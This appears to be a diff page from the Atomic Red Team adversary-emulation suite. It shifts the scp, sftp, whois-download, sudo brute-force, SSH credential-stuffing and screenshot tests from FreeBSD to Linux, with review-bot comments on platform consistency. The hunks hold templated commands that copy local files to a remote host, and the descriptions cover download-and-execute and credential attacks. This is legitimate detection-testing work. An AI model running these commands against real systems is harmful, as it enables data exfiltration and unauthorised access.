## Atomic Test #3 - scp remote file copy (push)
|
||||
Utilize scp to perform a remote file copy (push)
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 83a49600-222b-4866-80a0-37736ad29344
|
||||
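Review bot: unlike the rsync tests, scp and sftp are part of OpenSSH in FreeBSD base, so no package prerequisite is needed on that platform; the `scp #{local_file} #{username}@#{remote_host}:#{remote_path}` form shown in the next hunk header works unchanged. The only thing to settle for this hunk is the same `Freebsd, Linux, macOS` / `Linux, macOS` resolution as the rsync tests, applied consistently to the YAML.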
@@ -204,7 +204,7 @@ scp #{local_file} #{username}@#{remote_host}:#{remote_path}
|
||||
## Atomic Test #4 - scp remote file copy (pull)
|
||||
Utilize scp to perform a remote file copy (pull)
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** b9d22b9a-9778-4426-abf0-568ea64e9c33
|
||||
@@ -240,7 +240,7 @@ scp #{username}@#{remote_host}:#{remote_file} #{local_path}
|
||||
## Atomic Test #5 - sftp remote file copy (push)
|
||||
Utilize sftp to perform a remote file copy (push)
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** f564c297-7978-4aa9-b37a-d90477feea4e
|
||||
@@ -276,7 +276,7 @@ sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
|
||||
## Atomic Test #6 - sftp remote file copy (pull)
|
||||
Utilize sftp to perform a remote file copy (pull)
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 0139dba1-f391-405e-a4f5-f3989f2c88ef
|
||||
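Review bot: the hunk header context `sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'` (the command of the sftp push test) uses a here-string, which is a bash/ksh/zsh extension and is not available in POSIX `sh` or FreeBSD's `/bin/sh`; with an `sh` executor the test will fail on FreeBSD (and on Linux systems where `/bin/sh` is dash) regardless of how the `Freebsd, Linux, macOS` line is resolved. Suggest `printf 'put %s\n' "#{local_file}" | sftp #{username}@#{remote_host}:#{remote_path}` or an `sftp -b` batch file, applied to both the push and pull variants.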
@@ -597,7 +597,7 @@ Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually
|
||||
## Atomic Test #14 - whois file download
|
||||
Download a remote file using the whois utility
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** c99a829f-0bb8-4187-b2c6-d47d1df74cab
|
||||
|
||||
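Review bot: the whois download trick depends on `whois` opening a raw TCP connection to an attacker-chosen host and port and echoing back whatever is served; FreeBSD's base whois(1) accepts `-h host` and `-p port` like the Linux client, so the platform line can legitimately include FreeBSD, but the description should state which flags the command relies on, since other whois implementations differ. Resolve `Freebsd, Linux, macOS` versus `Linux, macOS` the same way as the rsync/scp/sftp hunks.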
@@ -6,7 +6,6 @@ atomic_tests:
|
||||
description: |
|
||||
Utilize rsync to perform a remote file copy (push)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
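Review bot: the hunk count `-6,7 +6,6` with no added line means one of `- freebsd`, `- linux`, `- macos` is deleted in the resolution, and the markdown hunk for this same test goes from `Freebsd, Linux, macOS` to `Linux, macOS`, which is consistent with the deleted line being `- freebsd`. If this merge is meant to keep FreeBSD support (other tests in this change are titled `(freebsd)`), that is a conflict resolution in the wrong direction and should be reverted here and in the five sibling hunks that follow (`-44,7 +43,6`, `-81,7 +79,6`, `-110,7 +107,6`, `-139,7 +135,6`, `-168,7 +163,6`, `-359,7 +353,6`), which show the same one-line drop.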
@@ -44,7 +43,6 @@ atomic_tests:
|
||||
description: |
|
||||
Utilize rsync to perform a remote file copy (pull)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -81,7 +79,6 @@ atomic_tests:
|
||||
description: |
|
||||
Utilize scp to perform a remote file copy (push)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -110,7 +107,6 @@ atomic_tests:
|
||||
description: |
|
||||
Utilize scp to perform a remote file copy (pull)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -139,7 +135,6 @@ atomic_tests:
|
||||
description: |
|
||||
Utilize sftp to perform a remote file copy (push)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -168,7 +163,6 @@ atomic_tests:
|
||||
description: |
|
||||
Utilize sftp to perform a remote file copy (pull)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -359,7 +353,6 @@ atomic_tests:
|
||||
description: |
|
||||
Download a remote file using the whois utility
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
|
||||
@@ -379,7 +379,7 @@ An adversary may find themselves on a box (e.g. via ssh key auth, with no passwo
|
||||
|
||||
This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** abcde488-e083-4ee7-bc85-a5684edd7541
|
||||
|
||||
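Review bot: the platform here swaps between `Freebsd` and `Linux` as a single-line replacement, so after the merge the test is listed for one platform only, and the YAML hunk below (`- freebsd` / `- linux` in a `-234,7 +234,7` hunk) does the same. The description's steps (create user `art` with password `password123`, log in, download and run sudo_bruteforce.sh, delete the user) are Linux-shaped: on FreeBSD user management is `pw useradd` / `pw userdel` and sudo is not in base (`pkg install sudo`). If `freebsd` is the intended platform the command and cleanup blocks need those equivalents; if `linux` is intended, the FreeBSD variant should be a separate test rather than a platform swap on this one.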
@@ -234,7 +234,7 @@ atomic_tests:
|
||||
|
||||
This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
remote_url:
|
||||
description: url of remote payload
|
||||
|
||||
@@ -130,7 +130,7 @@ brew install hudochenkov/sshpass/sshpass
|
||||
## Atomic Test #3 - SSH Credential Stuffing From FreeBSD
|
||||
Using username,password combination from a password dump to login over SSH.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** a790d50e-7ebf-48de-8daa-d9367e0911d4
|
||||
|
||||
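Review bot: the test is titled `SSH Credential Stuffing From FreeBSD`, yet this hunk swaps the platform line between `Freebsd` and `Linux` as a one-for-one replacement; whichever side wins, title and platform must agree, and a FreeBSD-titled test indexed under Linux only (or the reverse) is misleading. The header context `brew install hudochenkov/sshpass/sshpass` also shows the sshpass prerequisite is installed from a Homebrew tap; on FreeBSD it is `pkg install sshpass` (the `security/sshpass` port) and Linux distributions package it too, so the prerequisite command should branch on platform rather than assume Homebrew.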
@@ -69,7 +69,7 @@ atomic_tests:
|
||||
Using username,password combination from a password dump to login over SSH.
|
||||
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
|
||||
input_arguments:
|
||||
target_host:
|
||||
|
||||
@@ -153,7 +153,7 @@ sudo #{package_installer}
|
||||
## Atomic Test #4 - X Windows Capture (freebsd)
|
||||
Use xwd command to collect a full desktop screenshot and review file with xwud
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 562f3bc2-74e8-46c5-95c7-0e01f9ccc65c
|
||||
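Review bot: test #4 is titled `X Windows Capture (freebsd)` while its platform line is swapped between `Freebsd` and `Linux` in this hunk; the title and the resolved platform must agree. The header context `sudo #{package_installer}` shows prerequisite installation is a sudo-wrapped, caller-supplied package command; on FreeBSD `xwd` and `xwud` come from the `x11/xwd` and `x11/xwud` ports (`pkg install xwd xwud`) and sudo itself is not in base, so a FreeBSD default for `package_installer` is needed if that platform is kept. The test also requires a running X server with `DISPLAY` set, which is rare on FreeBSD servers; a prerequisite check for `DISPLAY` would make the failure mode explicit.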
@@ -253,7 +253,7 @@ sudo apt install graphicsmagick-imagemagick-compat
|
||||
## Atomic Test #6 - Capture Linux Desktop using Import Tool (freebsd)
|
||||
Use import command from ImageMagick to collect a full desktop screenshot
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 18397d87-38aa-4443-a098-8a48a8ca5d8d
|
||||
|
||||
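Review bot: test #6 is titled `Capture Linux Desktop using Import Tool (freebsd)` while its platform line is swapped between `Freebsd` and `Linux`; the title contradicts itself (Linux desktop, freebsd tag) and should name the platform the resolved line actually lists. The header context `sudo apt install graphicsmagick-imagemagick-compat` is Debian-specific; on FreeBSD the `import` tool is provided by `pkg install ImageMagick7` (or GraphicsMagick), so the prerequisite needs a `pkg` branch if `freebsd` stays, and the same `DISPLAY` caveat as the xwd test applies.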
@@ -74,7 +74,7 @@ atomic_tests:
|
||||
description: |
|
||||
Use xwd command to collect a full desktop screenshot and review file with xwud
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file path
|
||||
@@ -126,7 +126,7 @@ atomic_tests:
|
||||
description: |
|
||||
Use import command from ImageMagick to collect a full desktop screenshot
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file path
|
||||
|
||||
@@ -88,7 +88,7 @@ Get-Date
|
||||
## Atomic Test #3 - System Time Discovery in FreeBSD/macOS
|
||||
Identify system time. Upon execution, the local computer system time and timezone will be displayed.
|
||||
|
||||
**Supported Platforms:** Freebsd, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** f449c933-0891-407f-821e-7916a21a1a6f
|
||||
|
||||
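Review bot: the title `System Time Discovery in FreeBSD/macOS` matches `Freebsd, macOS` on one side of this hunk and contradicts `Linux, macOS` on the other; if `Linux, macOS` is the resolution the title must change with it. The corresponding YAML hunk for this test is not shown on this page (the diff is truncated below), so verify the YAML `supported_platforms` list was resolved the same way and regenerate the markdown from it rather than editing this line directly.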
Some files were not shown because too many files have changed in this diff.